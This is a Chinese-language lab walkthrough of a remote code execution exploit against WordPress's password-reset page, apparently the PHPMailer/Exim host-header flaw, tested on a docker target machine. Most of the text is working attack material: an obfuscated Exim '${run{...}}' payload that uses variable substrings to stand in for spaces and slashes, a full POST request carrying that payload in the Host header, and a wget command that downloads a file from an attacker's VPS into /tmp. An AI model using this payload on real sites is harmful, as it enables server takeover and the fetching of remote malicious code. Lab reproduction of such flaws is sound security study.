作者:momo左 | 来源:互联网 | 2023-09-23 23:42
一、启动靶机
docker-compose build
docker-compose up -d
访问URL进行install:
http://192.168.150.146:8080
二、生成payload
前提:命令中
空格 用 ${substr{10}{1}{$tod_log}}
代替
/ 用 ${substr{0}{1}{$spool_directory}}
代替
命令:
/usr/bin/wget --output-document /tmp/rce vps_ip/hacker
payload:
aa(any -froot@localhost -be ${run{/usr/bin/wget --output-document /tmp/rce vps_ip/hacker}} null)
最后payload:
aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce${substr{10}{1}{$tod_log}}VPS_IP${substr{0}{1}{$spool_directory}}hacker}} null)
三、发送payload
URL:
http://192.168.150.146:8080/wp-login.php?action=lostpassword
将payload替换host请求头
请求:
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce${substr{10}{1}{$tod_log}}VPS_IP${substr{0}{1}{$spool_directory}}hacker}} null)
Content-Length: 85
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.150.146:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.150.146:8080/wp-login.php?action=lostpassword
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
COOKIE: wordpress_test_COOKIE=WP+COOKIE+check
Connection: close
user_login=admin&redirect_to=&wp-submit=%E8%8E%B7%E5%8F%96%E6%96%B0%E5%AF%86%E7%A0%81
send
四、检验
在VPS上的apache日志有靶机的请求记录。
tail -n 1 -f /var/log/apache2/access.log
注意:
远程 URL 中不能有 http://
所有字母必须小写
参考:
https://www.cnblogs.com/ssooking/p/8893264.html